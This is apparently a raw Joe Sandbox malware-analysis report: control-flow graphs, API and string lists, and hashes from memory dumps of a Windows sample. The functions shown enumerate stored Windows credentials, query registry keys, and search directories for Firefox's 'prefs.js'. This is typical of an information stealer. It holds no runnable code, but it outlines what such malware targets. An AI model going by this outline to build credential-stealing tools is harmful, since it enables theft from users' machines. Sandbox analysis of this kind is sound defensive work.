                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1514 7ff6f1d820b0-7ff6f1d82182 1515 7ff6f1d82185-7ff6f1d8218c 1514->1515 1515->1515 1516 7ff6f1d8218e-7ff6f1d822ea call 7ff6f1d986b0 1515->1516 1519 7ff6f1d822f0-7ff6f1d822f8 1516->1519 1519->1519 1520 7ff6f1d822fa-7ff6f1d82378 call 7ff6f1d986b0 1519->1520 1523 7ff6f1d82380-7ff6f1d82388 1520->1523 1523->1523 1524 7ff6f1d8238a-7ff6f1d82411 call 7ff6f1d986b0 RegOpenKeyExA 1523->1524 1527 7ff6f1d82417-7ff6f1d82456 RegQueryValueExA 1524->1527 1528 7ff6f1d824ee-7ff6f1d824f5 1524->1528 1527->1528 1531 7ff6f1d8245c-7ff6f1d824a9 call 7ff6f1d986b0 call 7ff6f1d928e0 1527->1531 1529 7ff6f1d824fd-7ff6f1d8256e call 7ff6f1da5c20 1528->1529 1530 7ff6f1d824f7 RegCloseKey 1528->1530 1536 7ff6f1d825a2-7ff6f1d825b5 1529->1536 1537 7ff6f1d82570-7ff6f1d82582 1529->1537 1530->1529 1549 7ff6f1d824ab-7ff6f1d824bf 1531->1549 1550 7ff6f1d824df-7ff6f1d824e7 1531->1550 1541 7ff6f1d825bb-7ff6f1d82601 call 7ff6f1d7eaf0 1536->1541 1542 7ff6f1d82aa3-7ff6f1d82aae 1536->1542 1539 7ff6f1d8259d call 7ff6f1dfe880 1537->1539 1540 7ff6f1d82584-7ff6f1d82597 1537->1540 1539->1536 1540->1539 1546 7ff6f1d82c55-7ff6f1d82c5a call 7ff6f1de8254 1540->1546 1566 7ff6f1d82607-7ff6f1d8260a 1541->1566 1567 7ff6f1d82c25-7ff6f1d82c27 1541->1567 1544 7ff6f1d82ae9-7ff6f1d82b0e 1542->1544 1545 7ff6f1d82ab0-7ff6f1d82ac9 1542->1545 1554 7ff6f1d82b44-7ff6f1d82b5e 1544->1554 1555 7ff6f1d82b10-7ff6f1d82b24 1544->1555 1551 7ff6f1d82acb-7ff6f1d82ade 1545->1551 1552 7ff6f1d82ae4 call 7ff6f1dfe880 1545->1552 1573 7ff6f1d82c5b-7ff6f1d82c70 call 7ff6f1d7e1d0 1546->1573 1557 7ff6f1d824da call 7ff6f1dfe880 1549->1557 1558 7ff6f1d824c1-7ff6f1d824d4 1549->1558 1550->1528 1551->1552 1559 7ff6f1d82c71-7ff6f1d82c76 call 7ff6f1de8254 1551->1559 1552->1544 1564 7ff6f1d82b94-7ff6f1d82bae 1554->1564 1565 7ff6f1d82b60-7ff6f1d82b74 1554->1565 1562 7ff6f1d82b26-7ff6f1d82b39 1555->1562 1563 7ff6f1d82b3f call 7ff6f1dfe880 1555->1563 1557->1550 1558->1557 1568 7ff6f1d82c4f-7ff6f1d82c54 call 7ff6f1de8254 1558->1568 1600 7ff6f1d82c77-7ff6f1d82c7c call 7ff6f1de8254 1559->1600 1562->1563 1574 7ff6f1d82c8f-7ff6f1d82c94 call 7ff6f1de8254 1562->1574 1563->1554 1570 7ff6f1d82be0-7ff6f1d82c24 call 7ff6f1dfe860 1564->1570 1571 7ff6f1d82bb0-7ff6f1d82bc4 1564->1571 1579 7ff6f1d82b76-7ff6f1d82b89 1565->1579 1580 7ff6f1d82b8f call 7ff6f1dfe880 1565->1580 1566->1542 1581 7ff6f1d82610-7ff6f1d8262d call 7ff6f1d95140 1566->1581 1575 7ff6f1d82c29 1567->1575 1576 7ff6f1d82c34-7ff6f1d82c4e call 7ff6f1d7e240 1567->1576 1568->1546 1583 7ff6f1d82bdb call 7ff6f1dfe880 1571->1583 1584 7ff6f1d82bc6-7ff6f1d82bd9 1571->1584 1573->1559 1591 7ff6f1d82c95-7ff6f1d82c9a call 7ff6f1de8254 1574->1591 1575->1542 1576->1568 1579->1580 1579->1591 1580->1564 1581->1573 1602 7ff6f1d82633-7ff6f1d8264e 1581->1602 1583->1570 1584->1583 1595 7ff6f1d82c2e-7ff6f1d82c33 call 7ff6f1de8254 1584->1595 1595->1576 1610 7ff6f1d82c7d-7ff6f1d82c82 call 7ff6f1de8254 1600->1610 1606 7ff6f1d82658-7ff6f1d8268e call 7ff6f1d7e8c0 1602->1606 1607 7ff6f1d82650-7ff6f1d82654 1602->1607 1615 7ff6f1d8269d-7ff6f1d826be call 7ff6f1d7e9a0 1606->1615 1616 7ff6f1d82690-7ff6f1d82699 1606->1616 1607->1606 1617 7ff6f1d82c83-7ff6f1d82c88 call 7ff6f1de8254 1610->1617 1622 7ff6f1d826c4-7ff6f1d826c8 1615->1622 1623 7ff6f1d82a01-7ff6f1d82a0b 1615->1623 1616->1615 1624 7ff6f1d82c89-7ff6f1d82c8e call 7ff6f1d7cf70 1617->1624 1625 7ff6f1d826d0-7ff6f1d826e5 call 7ff6f1dcf8f0 1622->1625 1626 7ff6f1d82a0d-7ff6f1d82a17 1623->1626 1627 7ff6f1d82a37-7ff6f1d82a41 1623->1627 1624->1574 1638 7ff6f1d826eb-7ff6f1d82737 call 7ff6f1d93a40 call 7ff6f1d7d4e0 call 7ff6f1d7d370 1625->1638 1639 7ff6f1d829de-7ff6f1d829fb call 7ff6f1d7f380 call 7ff6f1d7e7b0 1625->1639 1626->1627 1632 7ff6f1d82a19-7ff6f1d82a2b 1626->1632 1628 7ff6f1d82a6d-7ff6f1d82a74 1627->1628 1629 7ff6f1d82a43-7ff6f1d82a4d 1627->1629 1628->1542 1635 7ff6f1d82a76-7ff6f1d82a80 1628->1635 1629->1628 1633 7ff6f1d82a4f-7ff6f1d82a61 1629->1633 1632->1627 1644 7ff6f1d82a2d-7ff6f1d82a36 1632->1644 1633->1628 1646 7ff6f1d82a63-7ff6f1d82a6c 1633->1646 1635->1542 1637 7ff6f1d82a82-7ff6f1d82a96 1635->1637 1637->1542 1652 7ff6f1d82a98-7ff6f1d82aa2 1637->1652 1659 7ff6f1d8273c-7ff6f1d827db call 7ff6f1d95310 call 7ff6f1d955e0 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 1638->1659 1660 7ff6f1d82739 1638->1660 1639->1623 1639->1625 1644->1627 1646->1628 1652->1542 1671 7ff6f1d827dd-7ff6f1d827ee 1659->1671 1672 7ff6f1d8280e-7ff6f1d82826 1659->1672 1660->1659 1673 7ff6f1d82809 call 7ff6f1dfe880 1671->1673 1674 7ff6f1d827f0-7ff6f1d82803 1671->1674 1675 7ff6f1d82859-7ff6f1d82871 1672->1675 1676 7ff6f1d82828-7ff6f1d82839 1672->1676 1673->1672 1674->1600 1674->1673 1680 7ff6f1d828a9-7ff6f1d828c7 1675->1680 1681 7ff6f1d82873-7ff6f1d82889 1675->1681 1678 7ff6f1d8283b-7ff6f1d8284e 1676->1678 1679 7ff6f1d82854 call 7ff6f1dfe880 1676->1679 1678->1610 1678->1679 1679->1675 1680->1624 1682 7ff6f1d828cd-7ff6f1d829dd call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1d929b0 call 7ff6f1d91900 call 7ff6f1d929b0 call 7ff6f1d91900 call 7ff6f1d917a0 call 7ff6f1d93ff0 1680->1682 1684 7ff6f1d8288b-7ff6f1d8289e 1681->1684 1685 7ff6f1d828a4 call 7ff6f1dfe880 1681->1685 1682->1639 1684->1617 1684->1685 1685->1680
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
                                                                                                                • String ID: content$directory_iterator::directory_iterator$exists$filename
                                                                                                                • API String ID: 1254564140-1400943384
                                                                                                                • Opcode ID: 9f5b94a6d0cea37691d2751b370f6b3d64bf25a2cf03a9f984be2f4356e4838d
                                                                                                                • Instruction ID: afa92ff154555d99050037b06255743fbd3a0b1844fd862e7eb9d63af3f6ad8a
                                                                                                                • Opcode Fuzzy Hash: 9f5b94a6d0cea37691d2751b370f6b3d64bf25a2cf03a9f984be2f4356e4838d
                                                                                                                • Instruction Fuzzy Hash: 84725D72A15BC589DB108F35D8803E977B0FB89798F509325EAAD57B99EF38D680C340

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1707 7ff6f1dbd080-7ff6f1dbd978 call 7ff6f1d7eaf0 * 2 1715 7ff6f1dbd97e-7ff6f1dbdd49 call 7ff6f1d7d4e0 call 7ff6f1d7d370 call 7ff6f1dbfdd0 call 7ff6f1dcf8f0 call 7ff6f1d7f380 1707->1715 1716 7ff6f1dbdd92-7ff6f1dbddbc call 7ff6f1dfe860 1707->1716 1732 7ff6f1dbdd7b-7ff6f1dbdd8b 1715->1732 1733 7ff6f1dbdd4b-7ff6f1dbdd5f 1715->1733 1732->1716 1734 7ff6f1dbdd61-7ff6f1dbdd74 1733->1734 1735 7ff6f1dbdd76 call 7ff6f1dfe880 1733->1735 1734->1735 1736 7ff6f1dbddbd-7ff6f1dbe39d call 7ff6f1de8254 call 7ff6f1d939b0 call 7ff6f1d979f0 call 7ff6f1d97ac0 call 7ff6f1e00e88 call 7ff6f1d7e1d0 * 3 call 7ff6f1de8254 * 4 call 7ff6f1d7e1d0 call 7ff6f1de8254 * 2 call 7ff6f1d7cf70 call 7ff6f1de8254 call 7ff6f1d7e1d0 call 7ff6f1de8254 * 2 call 7ff6f1d7cf70 call 7ff6f1d7d4e0 call 7ff6f1d7d370 1734->1736 1735->1732 1786 7ff6f1dbe3a0-7ff6f1dbe3a7 1736->1786 1786->1786 1787 7ff6f1dbe3a9-7ff6f1dbe5a8 call 7ff6f1da5c20 call 7ff6f1d7d810 call 7ff6f1d7da40 1786->1787 1794 7ff6f1dbe5b0-7ff6f1dbe5b8 1787->1794 1794->1794 1795 7ff6f1dbe5ba-7ff6f1dbe659 call 7ff6f1d986b0 call 7ff6f1da5c20 call 7ff6f1d7d810 call 7ff6f1dcf020 1794->1795 1803 7ff6f1dbe65e-7ff6f1dbe98a call 7ff6f1d7da40 * 2 call 7ff6f1d92c80 1795->1803 1810 7ff6f1dbe990-7ff6f1dbe997 1803->1810 1810->1810 1811 7ff6f1dbe999-7ff6f1dbe9c7 call 7ff6f1d97600 1810->1811 1814 7ff6f1dbf363-7ff6f1dbf36e 1811->1814 1815 7ff6f1dbe9cd-7ff6f1dbe9dc call 7ff6f1d7ea50 1811->1815 1817 7ff6f1dbf370-7ff6f1dbf37a 1814->1817 1818 7ff6f1dbf3a2-7ff6f1dbf3c2 1814->1818 1815->1814 1823 7ff6f1dbe9e2-7ff6f1dbea8e 1815->1823 1817->1818 1820 7ff6f1dbf37c 1817->1820 1821 7ff6f1dbf3e1-7ff6f1dbf464 call 7ff6f1d7f380 call 7ff6f1d92880 call 7ff6f1d7da40 call 7ff6f1d92880 call 7ff6f1dfe860 1818->1821 1822 7ff6f1dbf3c4-7ff6f1dbf3cd 1818->1822 1825 7ff6f1dbf384-7ff6f1dbf387 1820->1825 1822->1821 1832 7ff6f1dbf3cf-7ff6f1dbf3e0 1822->1832 1823->1814 1826 7ff6f1dbf477-7ff6f1dbf4f6 call 7ff6f1d7cf70 call 7ff6f1d7e240 call 7ff6f1d7e1d0 call 7ff6f1de8254 call 7ff6f1dbce40 1823->1826 1825->1818 1828 7ff6f1dbf389-7ff6f1dbf3a0 1825->1828 1828->1825 1832->1821
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: cannot use push_back() with $directory_iterator::directory_iterator$exists$prefs.js$status
                                                                                                                • API String ID: 0-2713369562
                                                                                                                • Opcode ID: de6baea8f9a6e51e17e32bfa88ea75e63669f65a2911f034b9996c5c67c448b3
                                                                                                                • Instruction ID: 166f21520e4a2d0fff53594aafecc12cdc063546d3a4879eb5ee70bdcdb4ddaf
                                                                                                                • Opcode Fuzzy Hash: de6baea8f9a6e51e17e32bfa88ea75e63669f65a2911f034b9996c5c67c448b3
                                                                                                                • Instruction Fuzzy Hash: E8522832909FC584D7B19B15E8813EAB3A4FBC9794F505226DADD82B99EF3CD194CB00

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1852 7ff6f1e0b5b0-7ff6f1e0b5f0 1853 7ff6f1e0b5f2-7ff6f1e0b5f9 1852->1853 1854 7ff6f1e0b605-7ff6f1e0b60e 1852->1854 1853->1854 1855 7ff6f1e0b5fb-7ff6f1e0b600 1853->1855 1856 7ff6f1e0b62a-7ff6f1e0b62c 1854->1856 1857 7ff6f1e0b610-7ff6f1e0b613 1854->1857 1858 7ff6f1e0b884-7ff6f1e0b8aa call 7ff6f1dfe860 1855->1858 1860 7ff6f1e0b882 1856->1860 1861 7ff6f1e0b632-7ff6f1e0b636 1856->1861 1857->1856 1859 7ff6f1e0b615-7ff6f1e0b61d 1857->1859 1863 7ff6f1e0b61f-7ff6f1e0b621 1859->1863 1864 7ff6f1e0b623-7ff6f1e0b626 1859->1864 1860->1858 1865 7ff6f1e0b63c-7ff6f1e0b63f 1861->1865 1866 7ff6f1e0b70d-7ff6f1e0b734 call 7ff6f1e0b984 1861->1866 1863->1856 1863->1864 1864->1856 1869 7ff6f1e0b641-7ff6f1e0b649 1865->1869 1870 7ff6f1e0b653-7ff6f1e0b665 GetFileAttributesExW 1865->1870 1876 7ff6f1e0b756-7ff6f1e0b75f 1866->1876 1877 7ff6f1e0b736-7ff6f1e0b73f 1866->1877 1869->1870 1872 7ff6f1e0b64b-7ff6f1e0b64d 1869->1872 1873 7ff6f1e0b667-7ff6f1e0b670 GetLastError 1870->1873 1874 7ff6f1e0b6b8-7ff6f1e0b6c7 1870->1874 1872->1866 1872->1870 1873->1858 1878 7ff6f1e0b676-7ff6f1e0b688 FindFirstFileW 1873->1878 1875 7ff6f1e0b6cb-7ff6f1e0b6cd 1874->1875 1881 7ff6f1e0b6d9-7ff6f1e0b707 1875->1881 1882 7ff6f1e0b6cf-7ff6f1e0b6d7 1875->1882 1885 7ff6f1e0b813-7ff6f1e0b81c 1876->1885 1886 7ff6f1e0b765-7ff6f1e0b77d GetFileInformationByHandleEx 1876->1886 1883 7ff6f1e0b74f-7ff6f1e0b751 1877->1883 1884 7ff6f1e0b741-7ff6f1e0b749 CloseHandle 1877->1884 1879 7ff6f1e0b68a-7ff6f1e0b690 GetLastError 1878->1879 1880 7ff6f1e0b695-7ff6f1e0b6b6 FindClose 1878->1880 1879->1858 1880->1875 1881->1860 1881->1866 1882->1866 1882->1881 1883->1858 1884->1883 1887 7ff6f1e0b8c5-7ff6f1e0b8ca call 7ff6f1de98b4 1884->1887 1888 7ff6f1e0b86b-7ff6f1e0b86d 1885->1888 1889 7ff6f1e0b81e-7ff6f1e0b832 GetFileInformationByHandleEx 1885->1889 1890 7ff6f1e0b77f-7ff6f1e0b78b GetLastError 1886->1890 1891 7ff6f1e0b7a5-7ff6f1e0b7be 1886->1891 1912 7ff6f1e0b8cb-7ff6f1e0b8d0 call 7ff6f1de98b4 1887->1912 1892 7ff6f1e0b8ab-7ff6f1e0b8af 1888->1892 1893 7ff6f1e0b86f-7ff6f1e0b873 1888->1893 1896 7ff6f1e0b858-7ff6f1e0b868 1889->1896 1897 7ff6f1e0b834-7ff6f1e0b840 GetLastError 1889->1897 1898 7ff6f1e0b78d-7ff6f1e0b798 CloseHandle 1890->1898 1899 7ff6f1e0b79e-7ff6f1e0b7a0 1890->1899 1891->1885 1894 7ff6f1e0b7c0-7ff6f1e0b7c4 1891->1894 1904 7ff6f1e0b8be-7ff6f1e0b8c3 1892->1904 1905 7ff6f1e0b8b1-7ff6f1e0b8bc CloseHandle 1892->1905 1893->1860 1901 7ff6f1e0b875-7ff6f1e0b880 CloseHandle 1893->1901 1902 7ff6f1e0b7c6-7ff6f1e0b7e0 GetFileInformationByHandleEx 1894->1902 1903 7ff6f1e0b80c 1894->1903 1896->1888 1897->1899 1907 7ff6f1e0b846-7ff6f1e0b851 CloseHandle 1897->1907 1898->1899 1900 7ff6f1e0b8d7-7ff6f1e0b8df call 7ff6f1de98b4 1898->1900 1899->1858 1901->1860 1901->1887 1909 7ff6f1e0b7e2-7ff6f1e0b7ee GetLastError 1902->1909 1910 7ff6f1e0b803-7ff6f1e0b80a 1902->1910 1911 7ff6f1e0b810 1903->1911 1904->1858 1905->1887 1905->1904 1913 7ff6f1e0b8d1-7ff6f1e0b8d6 call 7ff6f1de98b4 1907->1913 1914 7ff6f1e0b853 1907->1914 1909->1899 1917 7ff6f1e0b7f0-7ff6f1e0b7fb CloseHandle 1909->1917 1910->1911 1911->1885 1912->1913 1913->1900 1914->1899 1917->1912 1920 7ff6f1e0b801 1917->1920 1920->1899
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2398595512-0
                                                                                                                • Opcode ID: ae06ef96b620ec177ea6819a3a1ac38214177ad565b87e13f1ccf53398ca1eb7
                                                                                                                • Instruction ID: ca49f0ef26200f7e2c492a2e9109ffb1d96bf1f61a3771dfa5ab6c68e2a4ead3
                                                                                                                • Opcode Fuzzy Hash: ae06ef96b620ec177ea6819a3a1ac38214177ad565b87e13f1ccf53398ca1eb7
                                                                                                                • Instruction Fuzzy Hash: 38916E3AA08A4386E7648B25A81467A7290BF957F4F186730D97F877E4FF3CE5058B40

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1976 7ff6f1d8ca10-7ff6f1d8ca7a CredEnumerateA 1977 7ff6f1d8ca80-7ff6f1d8ca89 1976->1977 1978 7ff6f1d8d49c-7ff6f1d8d4cb call 7ff6f1dfe860 1976->1978 1980 7ff6f1d8d48f-7ff6f1d8d496 CredFree 1977->1980 1981 7ff6f1d8ca8f-7ff6f1d8caa7 1977->1981 1980->1978 1983 7ff6f1d8cab0-7ff6f1d8cb02 call 7ff6f1dfe888 1981->1983 1986 7ff6f1d8cb08-7ff6f1d8cb2e 1983->1986 1987 7ff6f1d8cd4d-7ff6f1d8cd54 1983->1987 1988 7ff6f1d8cb30-7ff6f1d8cb38 1986->1988 1989 7ff6f1d8cfa9-7ff6f1d8cfb0 1987->1989 1990 7ff6f1d8cd5a-7ff6f1d8cd7e 1987->1990 1988->1988 1991 7ff6f1d8cb3a-7ff6f1d8cbf7 call 7ff6f1d986b0 call 7ff6f1d95310 call 7ff6f1d955e0 1988->1991 1992 7ff6f1d8cfb6-7ff6f1d8d09f call 7ff6f1d986b0 call 7ff6f1d95310 call 7ff6f1d955e0 1989->1992 1993 7ff6f1d8d1f7-7ff6f1d8d1fa 1989->1993 1994 7ff6f1d8cd80-7ff6f1d8cd88 1990->1994 2023 7ff6f1d8cc00-7ff6f1d8cc08 1991->2023 2024 7ff6f1d8d0a0-7ff6f1d8d0a8 1992->2024 1995 7ff6f1d8d200-7ff6f1d8d28a 1993->1995 1996 7ff6f1d8d473-7ff6f1d8d489 call 7ff6f1d900f0 1993->1996 1994->1994 1999 7ff6f1d8cd8a-7ff6f1d8ce49 call 7ff6f1d986b0 call 7ff6f1d95310 call 7ff6f1d955e0 1994->1999 2000 7ff6f1d8d290-7ff6f1d8d298 1995->2000 1996->1980 1996->1983 2029 7ff6f1d8ce50-7ff6f1d8ce58 1999->2029 2000->2000 2005 7ff6f1d8d29a-7ff6f1d8d34b call 7ff6f1d986b0 call 7ff6f1d91900 2000->2005 2026 7ff6f1d8d350-7ff6f1d8d358 2005->2026 2023->2023 2027 7ff6f1d8cc0a-7ff6f1d8cc63 call 7ff6f1d986b0 call 7ff6f1d96bc0 call 7ff6f1d93ff0 2023->2027 2024->2024 2028 7ff6f1d8d0aa-7ff6f1d8d103 call 7ff6f1d986b0 call 7ff6f1d96bc0 call 7ff6f1d93ff0 2024->2028 2026->2026 2030 7ff6f1d8d35a-7ff6f1d8d3f8 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 call 7ff6f1dfe888 call 7ff6f1db51b0 2026->2030 2054 7ff6f1d8cc65-7ff6f1d8cc76 2027->2054 2055 7ff6f1d8cc96-7ff6f1d8ccb9 2027->2055 2056 7ff6f1d8d105-7ff6f1d8d116 2028->2056 2057 7ff6f1d8d136-7ff6f1d8d156 2028->2057 2029->2029 2033 7ff6f1d8ce5a-7ff6f1d8ceb3 call 7ff6f1d986b0 call 7ff6f1d96bc0 call 7ff6f1d93ff0 2029->2033 2123 7ff6f1d8d404-7ff6f1d8d419 call 7ff6f1d937f0 2030->2123 2124 7ff6f1d8d3fa-7ff6f1d8d3fc 2030->2124 2065 7ff6f1d8ceb5-7ff6f1d8cec6 2033->2065 2066 7ff6f1d8cee6-7ff6f1d8cf0c 2033->2066 2061 7ff6f1d8cc91 call 7ff6f1dfe880 2054->2061 2062 7ff6f1d8cc78-7ff6f1d8cc8b 2054->2062 2067 7ff6f1d8ccbb-7ff6f1d8cccc 2055->2067 2068 7ff6f1d8ccec-7ff6f1d8cd04 2055->2068 2063 7ff6f1d8d131 call 7ff6f1dfe880 2056->2063 2064 7ff6f1d8d118-7ff6f1d8d12b 2056->2064 2069 7ff6f1d8d158-7ff6f1d8d16c 2057->2069 2070 7ff6f1d8d18c-7ff6f1d8d1ae 2057->2070 2061->2055 2062->2061 2072 7ff6f1d8d526-7ff6f1d8d52b call 7ff6f1de8254 2062->2072 2063->2057 2064->2063 2073 7ff6f1d8d54a-7ff6f1d96d9d call 7ff6f1de8254 2064->2073 2074 7ff6f1d8cee1 call 7ff6f1dfe880 2065->2074 2075 7ff6f1d8cec8-7ff6f1d8cedb 2065->2075 2078 7ff6f1d8cf0e-7ff6f1d8cf22 2066->2078 2079 7ff6f1d8cf42-7ff6f1d8cf63 2066->2079 2080 7ff6f1d8ccce-7ff6f1d8cce1 2067->2080 2081 7ff6f1d8cce7 call 7ff6f1dfe880 2067->2081 2084 7ff6f1d8cd06-7ff6f1d8cd18 2068->2084 2085 7ff6f1d8cd38-7ff6f1d8cd4a 2068->2085 2082 7ff6f1d8d16e-7ff6f1d8d181 2069->2082 2083 7ff6f1d8d187 call 7ff6f1dfe880 2069->2083 2086 7ff6f1d8d1b0-7ff6f1d8d1c2 2070->2086 2087 7ff6f1d8d1e2-7ff6f1d8d1f5 2070->2087 2095 7ff6f1d8d52c-7ff6f1d8d531 call 7ff6f1de8254 2072->2095 2133 7ff6f1d96d9f 2073->2133 2134 7ff6f1d96dd1-7ff6f1d96de4 2073->2134 2074->2066 2075->2074 2090 7ff6f1d8d538-7ff6f1d8d53d call 7ff6f1de8254 2075->2090 2093 7ff6f1d8cf24-7ff6f1d8cf37 2078->2093 2094 7ff6f1d8cf3d call 7ff6f1dfe880 2078->2094 2099 7ff6f1d8cf65-7ff6f1d8cf76 2079->2099 2100 7ff6f1d8cf96-7ff6f1d8cfa6 2079->2100 2080->2081 2080->2095 2081->2068 2082->2083 2096 7ff6f1d8d4cc-7ff6f1d8d4d1 call 7ff6f1de8254 2082->2096 2083->2070 2101 7ff6f1d8cd33 call 7ff6f1dfe880 2084->2101 2102 7ff6f1d8cd1a-7ff6f1d8cd2d 2084->2102 2085->1987 2103 7ff6f1d8d1c4-7ff6f1d8d1d7 2086->2103 2104 7ff6f1d8d1dd call 7ff6f1dfe880 2086->2104 2087->1995 2110 7ff6f1d8d53e-7ff6f1d8d543 call 7ff6f1de8254 2090->2110 2093->2094 2093->2110 2094->2079 2115 7ff6f1d8d532-7ff6f1d8d537 call 7ff6f1de8254 2095->2115 2132 7ff6f1d8d4d2-7ff6f1d8d51f call 7ff6f1d939b0 call 7ff6f1d979f0 call 7ff6f1d97ac0 call 7ff6f1e00e88 2096->2132 2113 7ff6f1d8cf91 call 7ff6f1dfe880 2099->2113 2114 7ff6f1d8cf78-7ff6f1d8cf8b 2099->2114 2100->1989 2101->2085 2102->2101 2102->2115 2103->2104 2116 7ff6f1d8d520-7ff6f1d8d525 call 7ff6f1de8254 2103->2116 2104->2087 2127 7ff6f1d8d544-7ff6f1d8d549 call 7ff6f1de8254 2110->2127 2113->2100 2114->2113 2114->2127 2115->2090 2116->2072 2142 7ff6f1d8d41d-7ff6f1d8d429 2123->2142 2124->2132 2135 7ff6f1d8d402 2124->2135 2127->2073 2132->2116 2141 7ff6f1d96da0-7ff6f1d96dcf call 7ff6f1d99380 call 7ff6f1da9810 call 7ff6f1dfe880 2133->2141 2135->2142 2141->2134 2146 7ff6f1d8d42b-7ff6f1d8d44a 2142->2146 2147 7ff6f1d8d44c-7ff6f1d8d456 call 7ff6f1da0610 2142->2147 2150 7ff6f1d8d45b-7ff6f1d8d469 call 7ff6f1d93ff0 2146->2150 2147->2150 2150->1996
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Cred$EnumerateFree
                                                                                                                • String ID: cannot use push_back() with
                                                                                                                • API String ID: 1347986415-4122110429
                                                                                                                • Opcode ID: 590a931b7cf838f233e7f938dda60a37c5c44dfe0319c7dcb5131d4cd37b6d9b
                                                                                                                • Instruction ID: a1791636cde7579a7cff9373390c761a1674304e4b88b3a6a58a5eadddf8e73b
                                                                                                                • Opcode Fuzzy Hash: 590a931b7cf838f233e7f938dda60a37c5c44dfe0319c7dcb5131d4cd37b6d9b
